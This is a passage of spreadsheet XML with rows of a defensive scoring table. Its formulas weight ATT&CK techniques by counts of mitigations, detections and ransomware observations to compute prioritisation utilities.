        <v>5.1798499999999997E-2</v>
      </c>
      <c r="N46" s="51">
        <v>3</v>
      </c>
      <c r="O46" s="51">
        <v>10</v>
      </c>
      <c r="P46" s="51">
        <v>4</v>
      </c>
      <c r="Q46" s="51">
        <v>9</v>
      </c>
      <c r="R46" s="52" t="s">
        <v>263</v>
      </c>
      <c r="S46" s="51">
        <v>8</v>
      </c>
      <c r="T46" s="52" t="s">
        <v>264</v>
      </c>
      <c r="U46" s="51">
        <v>12</v>
      </c>
      <c r="V46" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31428571428571428</v>
      </c>
      <c r="W46">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>20</v>
      </c>
      <c r="X46">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Y46">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Z46">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>26</v>
      </c>
      <c r="AA46">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.26</v>
      </c>
      <c r="AB46">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.26</v>
      </c>
      <c r="AC46" s="29" t="s">
        <v>222</v>
      </c>
      <c r="AD46" s="25" t="str" cm="1">
        <f t="array" ref="AD46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC46)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE46" s="25">
        <f>IF(AD46="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF46" s="25" t="str" cm="1">
        <f t="array" ref="AF46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC46)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG46" s="25">
        <f>IF(AF46="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH46" s="25" t="str" cm="1">
        <f t="array" ref="AH46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC46)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI46" s="25">
        <f>IF(AH46="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ46" s="25" t="str" cm="1">
        <f t="array" ref="AJ46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC46)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK46" s="25">
        <f>IF(AJ46="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL46" s="25" t="str" cm="1">
        <f t="array" ref="AL46">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC46)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM46" s="25">
        <f>IF(AL46="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN46" s="52">
        <v>14</v>
      </c>
      <c r="AO46" s="51">
        <v>1</v>
      </c>
      <c r="AP46" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.52327508809523815</v>
      </c>
      <c r="AQ46" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1886947380952381</v>
      </c>
      <c r="AR46" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1886947380952381</v>
      </c>
      <c r="AS46" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="AT46" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="AU4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7" spans="1:47" ht="63.95">
      <c r="A47" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10286252615447619</v>
      </c>
      <c r="B47" s="25">
        <f>SUM(H47,M47,V47)*(1+SUM(AE47,AG47,AI47,AK47,AM47))</f>
        <v>0.6952919282114286</v>
      </c>
      <c r="C47" s="25" t="s">
        <v>265</v>
      </c>
      <c r="D47" s="25" t="s">
        <v>266</v>
      </c>
      <c r="E47" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F47" s="51">
        <v>2</v>
      </c>
      <c r="G47" s="51">
        <v>3</v>
      </c>
      <c r="H47" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I47">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J47">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K47">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L47">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M47" s="44">
        <v>4.9929769999999998E-2</v>
      </c>
      <c r="N47" s="51">
        <v>2</v>
      </c>
      <c r="O47" s="51">
        <v>4</v>
      </c>
      <c r="P47" s="51">
        <v>1</v>
      </c>
      <c r="Q47" s="51">
        <v>3</v>
      </c>
      <c r="R47" s="52" t="s">
        <v>267</v>
      </c>
      <c r="S47" s="51">
        <v>14</v>
      </c>
      <c r="T47" s="52" t="s">
        <v>268</v>
      </c>
      <c r="U47" s="51">
        <v>14</v>
      </c>
      <c r="V47" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31428571428571428</v>
      </c>
      <c r="W47">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>28</v>
      </c>
      <c r="X47">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="Y47">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="Z47">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA47">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB47">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC47" s="29" t="s">
        <v>269</v>
      </c>
      <c r="AD47" s="25" t="str" cm="1">
        <f t="array" ref="AD47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC47)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE47" s="25">
        <f>IF(AD47="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF47" s="25" t="str" cm="1">
        <f t="array" ref="AF47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC47)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG47" s="25">
        <f>IF(AF47="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH47" s="25" t="str" cm="1">
        <f t="array" ref="AH47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC47)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI47" s="25">
        <f>IF(AH47="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ47" s="25" t="str" cm="1">
        <f t="array" ref="AJ47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC47)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK47" s="25">
        <f>IF(AJ47="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL47" s="25" t="str" cm="1">
        <f t="array" ref="AL47">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC47)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM47" s="25">
        <f>IF(AL47="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN47" s="52">
        <v>1</v>
      </c>
      <c r="AO47" s="51">
        <v>1</v>
      </c>
      <c r="AP47" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10286252615447619</v>
      </c>
      <c r="AQ47" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.23176397607047619</v>
      </c>
      <c r="AR47" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.23176397607047619</v>
      </c>
      <c r="AS47" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT47" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU4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8" spans="1:47" ht="32.1">
      <c r="A48" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.337354397333334E-2</v>
      </c>
      <c r="B48" s="25">
        <f>SUM(H48,M48,V48)*(1+SUM(AE48,AG48,AI48,AK48,AM48))</f>
        <v>0.53373543973333337</v>
      </c>
      <c r="C48" s="25" t="s">
        <v>270</v>
      </c>
      <c r="D48" s="25" t="s">
        <v>271</v>
      </c>
      <c r="E48" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F48" s="51">
        <v>1</v>
      </c>
      <c r="G48" s="51">
        <v>1</v>
      </c>
      <c r="H48" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I48">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J48">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K48">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L48">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M48" s="44">
        <v>3.9400079999999997E-2</v>
      </c>
      <c r="N48" s="51">
        <v>0</v>
      </c>
      <c r="O48" s="51">
        <v>0</v>
      </c>
      <c r="P48" s="51">
        <v>5</v>
      </c>
      <c r="Q48" s="51">
        <v>0</v>
      </c>
      <c r="R48" s="52" t="s">
        <v>272</v>
      </c>
      <c r="S48" s="51">
        <v>6</v>
      </c>
      <c r="T48" s="52" t="s">
        <v>273</v>
      </c>
      <c r="U48" s="51">
        <v>19</v>
      </c>
      <c r="V48" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.26190476190476192</v>
      </c>
      <c r="W48">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X48">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y48">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z48">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA48">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB48">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC48" s="29" t="s">
        <v>274</v>
      </c>
      <c r="AD48" s="25" t="str" cm="1">
        <f t="array" ref="AD48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC48)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE48" s="25">
        <f>IF(AD48="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF48" s="25" t="str" cm="1">
        <f t="array" ref="AF48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC48)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG48" s="25">
        <f>IF(AF48="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH48" s="25" t="str" cm="1">
        <f t="array" ref="AH48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC48)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI48" s="25">
        <f>IF(AH48="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ48" s="25" t="str" cm="1">
        <f t="array" ref="AJ48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC48)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK48" s="25">
        <f>IF(AJ48="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL48" s="25" t="str" cm="1">
        <f t="array" ref="AL48">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC48)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM48" s="25">
        <f>IF(AL48="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN48" s="52">
        <v>0</v>
      </c>
      <c r="AO48" s="51">
        <v>0</v>
      </c>
      <c r="AP48" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.337354397333334E-2</v>
      </c>
      <c r="AQ48" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17791181324444447</v>
      </c>
      <c r="AR48" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17791181324444447</v>
      </c>
      <c r="AS48" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT48" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU4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9" spans="1:47">
      <c r="A49" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12226996270000001</v>
      </c>
      <c r="B49" s="25">
        <f>SUM(H49,M49,V49)*(1+SUM(AE49,AG49,AI49,AK49,AM49))</f>
        <v>0.22269962700000001</v>
      </c>
      <c r="C49" s="25" t="s">
        <v>275</v>
      </c>
      <c r="D49" s="25" t="s">
        <v>276</v>
      </c>
      <c r="E49" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F49" s="51">
        <v>1</v>
      </c>
      <c r="G49" s="51">
        <v>1</v>
      </c>
      <c r="H49" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I49">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J49">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K49">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L49">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M49" s="44">
        <v>3.8871900000000001E-2</v>
      </c>
      <c r="N49" s="51">
        <v>0</v>
      </c>
      <c r="O49" s="51">
        <v>2</v>
      </c>
      <c r="P49" s="51">
        <v>3</v>
      </c>
      <c r="Q49" s="51">
        <v>1</v>
      </c>
      <c r="R49" s="51"/>
      <c r="S49" s="51">
        <v>0</v>
      </c>
      <c r="T49" s="51"/>
      <c r="U49" s="51">
        <v>0</v>
      </c>
      <c r="V49" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W49">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X49">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y49">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z49">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA49">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB49">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC49" s="29" t="s">
        <v>277</v>
      </c>
      <c r="AD49" s="25" t="str" cm="1">
        <f t="array" ref="AD49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC49)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE49" s="25">
        <f>IF(AD49="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF49" s="25" t="str" cm="1">
        <f t="array" ref="AF49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC49)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG49" s="25">
        <f>IF(AF49="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH49" s="25" t="str" cm="1">
        <f t="array" ref="AH49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC49)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI49" s="25">
        <f>IF(AH49="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ49" s="25" t="str" cm="1">
        <f t="array" ref="AJ49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC49)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK49" s="25">
        <f>IF(AJ49="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL49" s="25" t="str" cm="1">
        <f t="array" ref="AL49">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC49)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM49" s="25">
        <f>IF(AL49="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN49" s="52">
        <v>3</v>
      </c>
      <c r="AO49" s="51">
        <v>1</v>
      </c>
      <c r="AP49" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12226996270000001</v>
      </c>
      <c r="AQ49" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.4233209000000008E-2</v>
      </c>
      <c r="AR49" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.4233209000000008E-2</v>
      </c>
      <c r="AS49" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT49" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU4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0" spans="1:47">
      <c r="A50" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.7032606650190488E-2</v>
      </c>
      <c r="B50" s="25">
        <f>SUM(H50,M50,V50)*(1+SUM(AE50,AG50,AI50,AK50,AM50))</f>
        <v>0.43699273316857146</v>
      </c>
      <c r="C50" s="25" t="s">
        <v>278</v>
      </c>
      <c r="D50" s="25" t="s">
        <v>279</v>
      </c>
      <c r="E50" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F50" s="51">
        <v>1</v>
      </c>
      <c r="G50" s="51">
        <v>1</v>
      </c>
      <c r="H50" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I50">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J50">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K50">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L50">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M50" s="44">
        <v>3.6197130000000001E-2</v>
      </c>
      <c r="N50" s="51">
        <v>0</v>
      </c>
      <c r="O50" s="51">
        <v>6</v>
      </c>
      <c r="P50" s="51">
        <v>8</v>
      </c>
      <c r="Q50" s="51">
        <v>2</v>
      </c>
      <c r="R50" s="52" t="s">
        <v>280</v>
      </c>
      <c r="S50" s="51">
        <v>8</v>
      </c>
      <c r="T50" s="51" t="s">
        <v>281</v>
      </c>
      <c r="U50" s="51">
        <v>8</v>
      </c>
      <c r="V50" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142859</v>
      </c>
      <c r="W50">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X50">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y50">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z50">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>16</v>
      </c>
      <c r="AA50">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.16</v>
      </c>
      <c r="AB50">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.16</v>
      </c>
      <c r="AC50" s="29" t="s">
        <v>136</v>
      </c>
      <c r="AD50" s="25" t="str" cm="1">
        <f t="array" ref="AD50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC50)))))&gt;0,"1","0")</f>
        <v>1</v>
